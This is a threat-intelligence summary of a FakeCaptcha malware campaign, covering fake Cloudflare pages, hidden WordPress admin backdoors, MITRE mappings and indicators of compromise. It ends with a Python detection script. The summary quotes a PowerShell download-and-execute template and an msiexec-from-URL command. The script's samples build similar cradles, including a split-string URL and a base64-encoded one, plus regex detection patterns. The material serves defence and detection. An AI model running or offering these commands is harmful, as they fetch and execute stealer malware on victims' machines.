This article analyzes a sophisticated FakeCaptcha malware campaign that tricks victims into executing malicious PowerShell commands via fake Cloudflare CAPTCHA pages, involving multiple layered obfuscation techniques and affiliate tracking capabilities. It also details the investigation of compromised WordPress sites including the deployment of persistent, hidden backdoor plugins and expands on the threat infrastructure and indicators to assist in detection and mitigation. #FakeCaptcha #LummaStealer #WordPressBackdoor #AurotunStealer #Donutloader
Key points
- The FakeCaptcha attack abuses legitimate CAPTCHA trust by redirecting victims from compromised websites to fake Cloudflare CAPTCHA pages instructing them to run malicious PowerShell commands via Windows Run, leading to malware infection.
- The attack framework includes advanced victim tracking through multiple POST logs, detection of Windows key combinations, and a mechanism to prevent repeated infection via localStorage flags.
- An automated PowerShell payload generator dynamically constructs obfuscated PowerShell commands with randomly selected domains from a hardcoded list to evade detection, although this feature was not actively used in observed samples.
- The threat actor deployed two sophisticated and persistent WordPress backdoor plugins on compromised servers that create hidden administrator accounts (backupsystems and adminbackup) fully concealed from WordPress interfaces, REST API, and user queries.
- The attacker infrastructure includes a broad array of domains and URLs related to fake Cloudflare pages, payload delivery, and affiliate tracking, facilitating broad scale infection and monetization strategies.
- Investigation revealed use of Lumma Stealer, Aurotun Stealer, and Donutloader malware families delivered through this method, indicating a multi-malware campaign.
- Several legitimate high-value organization websites were compromised, highlighting the risk of sensitive data exposure and the evolving threat landscape of FakeCaptcha frameworks.
MITRE Techniques
- [T1059.001] PowerShell – Used to execute remote code by instructing victims to run obfuscated PowerShell commands downloaded from attacker-controlled domains via Invoke-WebRequest and Invoke-Expression (e.g. powershell -w hidden -Command "& { $url=(…); iex (iwr -Uri $url -UseBasicParsing) }").
- [T1078] Valid Accounts – Backdoor WordPress plugins create hidden administrator accounts (‘backupsystems’ and ‘adminbackup’) giving persistent access.
- [T1566.001] Phishing: Spearphishing Link – Victims are lured to compromised legitimate websites that redirect them via fake CAPTCHA pages.
- [T1190] Exploit Public-Facing Application – Compromised WordPress sites serve malicious JavaScript leading to infection (injection into “main.min.js”).
- [T1112] Modify Registry – Indirectly inferred by use of PowerShell commands that may modify system settings when executing payloads.
- [T1222] File and Directory Permissions Modification – Backdoor plugins alter system files such as themes’ functions.php and plugin files to maintain persistence.
- [T1027] Obfuscated Files or Information – PowerShell payload and URL obfuscation through splitting and concatenation tactics to evade detection.
- [T1083] File and Directory Discovery – Backdoor plugins query WordPress database and settings to hide malicious administrator users from user lists and REST API.
Indicators of Compromise
- [Domains] Related to attack infrastructure and payload delivery – analytiwave.com, goclouder.com, amoliera.com, security.flargyard.com, sharecloud.click.
- [Domains] Fake Cloudflare phishing pages – security.claufgaurd.com, security.clodaflare.com, security.flargyard.com, security.cloudstwr.com, security.flaiegaurd.com.
- [IP Addresses and C2] Payload command and control servers – 91.200.14.69:7712, uplink-routes.asiad-nodes.shop.
- [File Names] WordPress backdoors – core-handler/core-handler.php (hash: c83d1d9b7fc84bf5a5feb320795d4e82615f82ad1a1520148ba9169d13272a4c), core-handler2/core-handler.php (hash: 1f3f3d940375fb237e3c9fd3e7534edb4a9232a8747d5da039f03558ccff8a43).
- [File Names] JavaScript injection in compromised theme – /wp-content/themes/Dummy/assets/js/main.min.js.
- [Payload Hashes] Malware samples associated with Aurotun Stealer and Donutloader – c078b10c298528c6a50a776519ef2be6819c43642aa82a88784d85e35d6b8298.
- [Commands] Malicious PowerShell commands template using Invoke-WebRequest and Invoke-Expression with obfuscated URLs, and MSI execution commands such as msiexec.exe /i hxxps://fopelas.com/flare.msi /qn.
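As an added detection example (not code from the article, nor part of the FakeCaptcha framework it describes), the script below scores process-creation command lines, such as the CommandLine field of Sysmon Event ID 1 or Windows Security event 4688, for the execution pattern summarised in the T1059.001, T1027 and [Commands] entries above: a hidden PowerShell window, a download cradle fed into Invoke-Expression, URLs split across quoted string pieces joined with +, -EncodedCommand payloads, and msiexec installing straight from a URL. The sample command lines are constructed for this example; the domain list is taken from the indicators on this page, and placeholder.invalid is a stand-in domain.

```python
import base64
import re

# Domains listed in this page's indicators of compromise.
KNOWN_DOMAINS = {
    "analytiwave.com", "goclouder.com", "amoliera.com", "security.flargyard.com",
    "sharecloud.click", "security.claufgaurd.com", "security.clodaflare.com",
    "security.cloudstwr.com", "security.flaiegaurd.com",
    "uplink-routes.asiad-nodes.shop", "fopelas.com",
}

# Constructed -EncodedCommand payload (UTF-16LE base64, as PowerShell expects).
_ENCODED = base64.b64encode(
    "iex (iwr http://placeholder.invalid/x.txt)".encode("utf-16-le")
).decode("ascii")

# Constructed sample command lines (not taken from the article).
SAMPLE_COMMAND_LINES = [
    # FakeCaptcha-style: hidden window, URL split with '+', iwr result passed to iex
    "powershell -w hidden -Command \"& { $url=('https://analyti'+'wave.com/p.txt'); "
    "iex (iwr -Uri $url -UseBasicParsing) }\"",
    # MSI variant: quiet install directly from a URL
    "msiexec.exe /i https://placeholder.invalid/flare.msi /qn",
    # Benign scheduled admin script
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\nightly-backup.ps1",
    # Benign local MSI install by a deployment tool
    "msiexec.exe /i C:\\installers\\agent.msi /qn",
    # Same cradle hidden behind -enc
    f"powershell -w 1 -enc {_ENCODED}",
]

HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+(?:hidden|h|1)\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|net\.webclient)\b", re.I)
EXEC_PRIMITIVE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
MSI_FROM_URL = re.compile(r"msiexec(?:\.exe)?\s+/i\s+https?://", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SPLIT_JOIN = re.compile(r"['\"]\s*\+\s*['\"]")  # 'abc'+'def' style concatenation
DOMAIN = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand text, or '' if absent or undecodable."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def normalize(cmdline: str) -> str:
    """Join split string literals and append any decoded -enc payload so URLs become visible."""
    joined = SPLIT_JOIN.sub("", cmdline)
    decoded = decode_encoded_command(cmdline)
    return joined + (" " + decoded if decoded else "")


def analyze(cmdline: str) -> list[str]:
    """Return the list of indicator names matched by one command line (empty if none)."""
    text = normalize(cmdline)
    reasons = []
    if "powershell" in cmdline.lower():
        if HIDDEN_WINDOW.search(cmdline):
            reasons.append("hidden-window")
        if DOWNLOAD_CRADLE.search(text) and EXEC_PRIMITIVE.search(text):
            reasons.append("download-and-execute")
        if ENCODED_ARG.search(cmdline):
            reasons.append("encoded-command")
    if MSI_FROM_URL.search(text):
        reasons.append("msiexec-from-url")
    if SPLIT_JOIN.search(cmdline) and DOMAIN.search(text):
        reasons.append("string-split-url")
    for host in DOMAIN.findall(text):
        if host.lower() in KNOWN_DOMAINS:
            reasons.append(f"known-domain:{host.lower()}")
    return reasons


def scan(command_lines) -> list[tuple[str, list[str]]]:
    """Return (command line, reasons) for every line that matched at least one indicator."""
    results = []
    for cmdline in command_lines:
        reasons = analyze(cmdline)
        if reasons:
            results.append((cmdline, reasons))
    return results


if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_COMMAND_LINES):
        print(", ".join(reasons), "<-", cmdline[:80])
```

The string-join normalisation is what lets the known-domain match fire on the first sample even though the domain never appears contiguously in the raw command line; without it a plain IoC string match misses exactly the split-and-concatenate obfuscation the T1027 entry describes. A hidden window alone is not treated as malicious, but combined with a download cradle or a known domain it is a strong FakeCaptcha signal worth an alert.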
Read more: https://gi7w0rm.medium.com/hulucaptcha-an-example-of-a-fakecaptcha-framework-9f50eeeb2e6d